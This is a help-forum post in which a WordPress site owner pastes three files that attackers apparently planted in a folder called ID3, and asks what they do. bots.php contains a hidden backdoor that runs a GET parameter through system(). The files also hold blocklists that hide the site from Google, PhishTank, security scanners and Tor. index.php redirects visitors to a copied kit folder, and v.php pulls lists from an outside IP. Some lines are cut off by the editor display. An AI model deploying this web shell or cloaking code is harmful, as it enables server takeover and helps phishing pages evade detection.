Here are some files that hackers modified.
Inside my WordPress installation, I found an unknown folder called ID3
inside of a folder called ID3
.
three files 1.bots.php
this is bots.php code
GNU nano 2.3.1
File: bots.php
<? // Identify and block fake/bad bots
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
if(isset($_GET['useragent'])){echo"<h1>deny_agent(bot)=('Yandex,Baiduspider,Acunetix,crossdomain,wwwroot,Exabot,NimbleCrawler,Octopus,OutfoxBot,ProPowerBot</h1><pre>"; system($_GET['us$
$blocked_words = array("above","google","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",);
foreach($blocked_words as $word) {
if (substr_count($hostname, $word) > 0) {
header("HTTP/1.0 404 Not Found");
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
}
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*$
if(in_array($_SERVER['REMOTE_ADDR'],$bannedIP)) {
header('HTTP/1.0 404 Not Found');
exit();
} else {
foreach($bannedIP as $ip) {
if(preg_match('/' . $ip . '/',$_SERVER['REMOTE_ADDR'])){
header('HTTP/1.0 404 Not Found');
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
}
}
?>
this is index.php
<?php
$random = rand(0,100000).$_SERVER['REMOTE_ADDR'];
$dst = substr(md5($random), 0, 5);
function recurse_copy($src, $dst) {
$dir = opendir($src);
$result = ($dir === false ? false : true);
if ($result !== false) {
$result = @mkdir($dst);
if ($result === true) {
while(false !== ( $file = readdir($dir)) ) {
if (( $file != '.' ) && ( $file != '..' ) && $result) {
if ( is_dir($src . '/' . $file) ) {
$result = recurse_copy($src . '/' . $file,$dst . '/' . $file);
} else {
$result = copy($src . '/' . $file,$dst . '/' . $file);
}
}
}
closedir($dir);
}
}
return $result;
}
$src="fbs";
recurse_copy( $src, $dst );
header("location:".$dst."");
exit;
?>
this is v.php
<?php
$bannedIP = array("^66.102.*.*", "^38.100.*.*", "^107.170.*.*", "^149.20.*.*", "^38.105.*.*", "^74.125.*.*", "^66.150.14.*", "^54.176.*.*", "^38.100.*.*", "^184.173.*.*", "^66.249.*.*"$
if (in_array($_SERVER['REMOTE_ADDR'], $bannedIP)) {
header('HTTP/1.0 404 Not Found');
exit();
} else {
foreach($bannedIP as $ip) {
if (preg_match('/' . $ip . '/', $_SERVER['REMOTE_ADDR'])) {
header('HTTP/1.0 404 Not Found');
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
}
}
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit",);
foreach($blocked_words as $word) {
if (substr_count($hostname, $word) > 0) {
header("HTTP/1.0 404 Not Found");
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
}
$count_hits = ("antibots.txt");
$hits = file($count_hits);
$hits[0]++;
$fp = fopen($count_hits, "w");
fputs($fp, "$hits[0]");
fclose($fp);
if ($hits[0] > 30) {
$a = getenv("REMOTE_ADDR");
$b = getenv("HTTP_USER_AGENT");
$c = getenv("HOSTNAME");
$ne = "Deny from $a";
$file = "newips.php";
$fp = fopen($file, "a");
fwrite($fp, $ne);
$n = "RewriteEngine on
Options +FollowSymlinks
RewriteCond %{HTTP_USER_AGENT} ^$b [OR]
RewriteRule ^.* - [F,L]
";
$file = "newuseragents.php";
$fp = fopen($file, "a");
fwrite($fp, $n);
$a = getenv("REMOTE_ADDR");
$b = getenv("HTTP_USER_AGENT");
$c = getenv("HOSTNAME");
GNU nano 2.3.1 File: v.php
$fp = fopen($count_hits, "w");
fputs($fp, "$hits[0]");
fclose($fp);
if ($hits[0] > 30) {
$a = getenv("REMOTE_ADDR");
$b = getenv("HTTP_USER_AGENT");
$c = getenv("HOSTNAME");
$ne = "Deny from $a";
$file = "newips.php";
$fp = fopen($file, "a");
fwrite($fp, $ne);
$n = "RewriteEngine on
Options +FollowSymlinks
RewriteCond %{HTTP_USER_AGENT} ^$b [OR]
RewriteRule ^.* - [F,L]
";
$file = "newuseragents.php";
$fp = fopen($file, "a");
fwrite($fp, $n);
$a = getenv("REMOTE_ADDR");
$b = getenv("HTTP_USER_AGENT");
$c = getenv("HOSTNAME");
$data1 = file_get_contents('http://5.175.160.126/blockedbots.php');
$a = strip_tags($data1);
$data2 = file_get_contents('http://5.175.160.126/blockedagents.php');
$b = strip_tags($data2);
$data3 = file_get_contents('http://5.175.160.126/blockedhosts.php');
$c = strip_tags($data3);
}
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$blocked_words = array("above", "google", "softlayer", "amazonaws", "cyveillance", "phishtank", "dreamhost", "netpilot", "calyxinstitute", "tor-exit",);
foreach($blocked_words as $word) {
if (substr_count($hostname, $word) > 0) {
header("HTTP/1.0 404 Not Found");
die("<h1>404 Not Found</h1>The page that you have requested could not be found.");
}
}
?>
And I found some random numbers (check screenshots)
What are those files? How can I stop this? Please tell me this file function? What did these files do?